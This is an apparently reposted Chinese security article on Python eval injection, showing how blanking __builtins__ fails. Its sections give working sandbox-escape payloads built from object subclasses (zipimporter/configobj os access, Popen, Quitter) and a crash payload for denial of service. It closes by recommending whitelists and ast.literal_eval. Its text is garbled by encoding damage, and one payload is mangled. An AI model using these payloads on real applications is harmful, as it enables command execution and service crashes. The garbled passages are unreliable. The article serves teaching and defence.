摘要:但如果對(duì)用戶的請(qǐng)求處理不恰當(dāng)�,就會(huì)造成嚴(yán)重的安全漏洞�。經(jīng)過測(cè)試�����,的構(gòu)造函數(shù)是被解釋器沙箱隔離的��。構(gòu)造完成后�����,調(diào)用函數(shù)即可觸發(fā)��,其思路不可謂不淫蕩�����。
eval前言
In [1]: eval("2+3")
Out[1]: 5
In [2]: eval("[x for x in range(9)]")
Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]
當(dāng)內(nèi)存中的內(nèi)置模塊含有os的話�,eval同樣可以做到命令執(zhí)行:
In [3]: import os
In [4]: eval("os.system("whoami")")
hy-201707271917administrator
Out[4]: 0
當(dāng)然,eval只能執(zhí)行Python的表達(dá)式類型的代碼���,不能直接用它進(jìn)行import操作�,但exec可以�����。如果非要使用eval進(jìn)行import,則使用__import__:
In [8]: eval("__import__("os").system("whoami")")
hy-201707271917administrator
Out[8]: 0
在實(shí)際的代碼中���,往往有使用客戶端數(shù)據(jù)帶入eval中執(zhí)行的需求。比如動(dòng)態(tài)模塊的引入���,舉個(gè)栗子�����,一個(gè)在線爬蟲平臺(tái)上爬蟲可能有多個(gè)并且位于不同的模塊中�,服務(wù)器端但往往只需要調(diào)用用戶在客戶端選擇的爬蟲類型�,并通過后端的exec或者eval進(jìn)行動(dòng)態(tài)調(diào)用,后端編碼實(shí)現(xiàn)非常方便�����。但如果對(duì)用戶的請(qǐng)求處理不恰當(dāng)����,就會(huì)造成嚴(yán)重的安全漏洞。
安全”使用eval
現(xiàn)在提倡最多的就是使用eval的后兩個(gè)參數(shù)來設(shè)置函數(shù)的白名單:
Eval函數(shù)的聲明為eval(expression[, globals[, locals]])
其中����,第二三個(gè)參數(shù)分別指定能夠在eval中使用的函數(shù)等�,如果不指定���,默認(rèn)為globals()和locals()函數(shù)中 包含的模塊和函數(shù)����。
>>> import os
>>> "os" in globals()
True
>>> eval("os.system("whoami")")
win-20140812chjadministrator
0
>>> eval("os.system("whoami")",{},{})
Traceback (most recent call last):
File "", line 1, in
File "", line 1, in
NameError: name "os" is not defined
如果指定只允許調(diào)用abs函數(shù)���,可以使用下面的寫法:
>>> eval("abs(-20)",{"abs":abs},{"abs":abs})
20
>>> eval("os.system("whoami")",{"abs":abs},{"abs":abs})
Traceback (most recent call last):
File "", line 1, in
File "", line 1, in
NameError: name "os" is not defined
>>> eval("os.system("whoami")")
win-20140812chjadministrator
0
使用這種方法來防護(hù)��,確實(shí)可以起到一定的作用�����,但是�����,這種處理方法可能會(huì)被繞過����,從而造成其他問題�����!
繞過執(zhí)行代碼1
被繞過的情景如下,小明知道了eval會(huì)帶來一定的安全風(fēng)險(xiǎn)���,所以使用如下的手段去防止eval執(zhí)行任意代碼:
env = {}
env["locals"] = None
env["globals"] = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
eval(users_str, env)
Python中的__builtins__是內(nèi)置模塊�,用來設(shè)置內(nèi)置函數(shù)的模塊���。比如熟悉的abs,open等內(nèi)置函數(shù)���,都是在該模塊中以字典的方式存儲(chǔ)的�,下面兩種寫法是等價(jià)的:
>>> __builtins__.abs(-20)
20
>>> abs(-20)
20
我們也可以自定義內(nèi)置函數(shù)�����,并像使用Python中的內(nèi)置函數(shù)一樣使用它們:
>>> def hello():
... print "shabi"
>>> __builtin__.__dict__["say_hello"] = hello
>>> say_hello()
shabi
小明將eval函數(shù)的作用域中的內(nèi)置模塊設(shè)置為None�,好像看起來很徹底了,但依然可以被繞過����。__builtins__是__builtin__的一個(gè)引用,在__main__模塊下��,兩者是等價(jià)的:
>>> id(__builtins__)
3549136
>>> id(__builtin__)
3549136
根據(jù)烏云drops提到的方法,使用如下代碼即可:
[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")
上面的代碼首先利用__class__和__subclasses__動(dòng)態(tài)加載了object對(duì)象��,這是因?yàn)閑val中無法直接使用object�。然后使用object的子類的zipimporter對(duì)egg壓縮文件中的configobj模塊進(jìn)行導(dǎo)入,并調(diào)用其內(nèi)置模塊中的os模塊從而實(shí)現(xiàn)命令執(zhí)行�����,當(dāng)然�,前提是要有configobj的egg文件。 configobj模塊很有意思����,居然內(nèi)置了os模塊:
>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chjadministrator
0
和configobj類似的模塊如urllib,urllib2�,setuptools等都有os的內(nèi)置,理論上使用哪個(gè)都行��。 如果無法下載egg壓縮文件�����,可以下載帶有setup.py的文件夾���,加入:
from setuptools import setup, find_packages
然后執(zhí)行:
python setup.py bdist_egg
就可以在dist文件夾中找到對(duì)應(yīng)的egg文件�。 繞過demo如下:
>>> env = {}
>>> env["locals"] = None
>>> env["globals"] = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("E:/internships/configobj-5.0.5-py2.7.egg").load_module("configobj").os.system("whoami")"
>>> eval(users_str, env)
win-20140812chjadministrator
0
>>> eval(users_str, {}, {})
win-20140812chjadministrator
0
拒絕服務(wù)攻擊1
object的子類中有很多有趣的東西,執(zhí)行以下代碼查看:
[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]
這里我就不輸出結(jié)果了��,如果你執(zhí)行的話��,可以看到很多有趣的模塊���,比如file�����,zipimporter,Quitter等����。經(jīng)過測(cè)試,file的構(gòu)造函數(shù)是被解釋器沙箱隔離的�。 簡單的,或者直接使object暴露出的子類Quitter進(jìn)行退出:
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
== "Quitter"][0](0)()", {"__builtins__":None})
C:/>
如果運(yùn)氣好��,遇到對(duì)方程序中導(dǎo)入了os等敏感模塊�,那么Popen就可以用,并且繞過__builins__為空的限制����,例子如下:
>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "Popen"][0](["ping","-n","1","127.0.0.1"])",{"__builtins__":None})
>>>
正在 Ping 127.0.0.1 具有 32 字節(jié)的數(shù)據(jù):
來自 127.0.0.1 的回復(fù): 字節(jié)=32 時(shí)間>>
事實(shí)上�,這種情況非常多����,比如導(dǎo)入os模塊,一般用來處理路徑問題���。所以說�,遇到這種情況��,完全可以列舉大量的功能函數(shù)����,來探測(cè)目標(biāo)object的子類中是否含有一些危險(xiǎn)的函數(shù)可以直接使用。
拒絕服務(wù)攻擊2
同樣�����,我們甚至可以繞過__builtins__為None���,造成一次拒絕服務(wù)攻擊����,Payload(來自老外blog)如下:
>>> eval("(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()", {"__builtins__":None})
運(yùn)行上面的代碼����,Python直接crash掉了���,造成拒絕服務(wù)攻擊。 原理是通過嵌套的lambda來構(gòu)造一片代碼段�,即code對(duì)象。為這個(gè)code對(duì)象分配空的棧���,并給出相應(yīng)的代碼字符串�,這里是KABOOM�����,在空棧上執(zhí)行代碼�,會(huì)出現(xiàn)crash���。構(gòu)造完成后���,調(diào)用fc函數(shù)即可觸發(fā),其思路不可謂不淫蕩���。
總結(jié)
從上面的內(nèi)容我們可以看出��,單單將內(nèi)置模塊置為空����,是不夠的,最好的機(jī)制是構(gòu)造白名單�,如果覺得比較麻煩,可以使用ast.literal_eval代替不安全的eval�。
參考資料:
【1】http://nedbatchelder.com/blog...
【2】http://drops.wooyun.org/web/7490
【3】http://stackoverflow.com/ques...
【4】http://www.chenxm.cc/post/329...
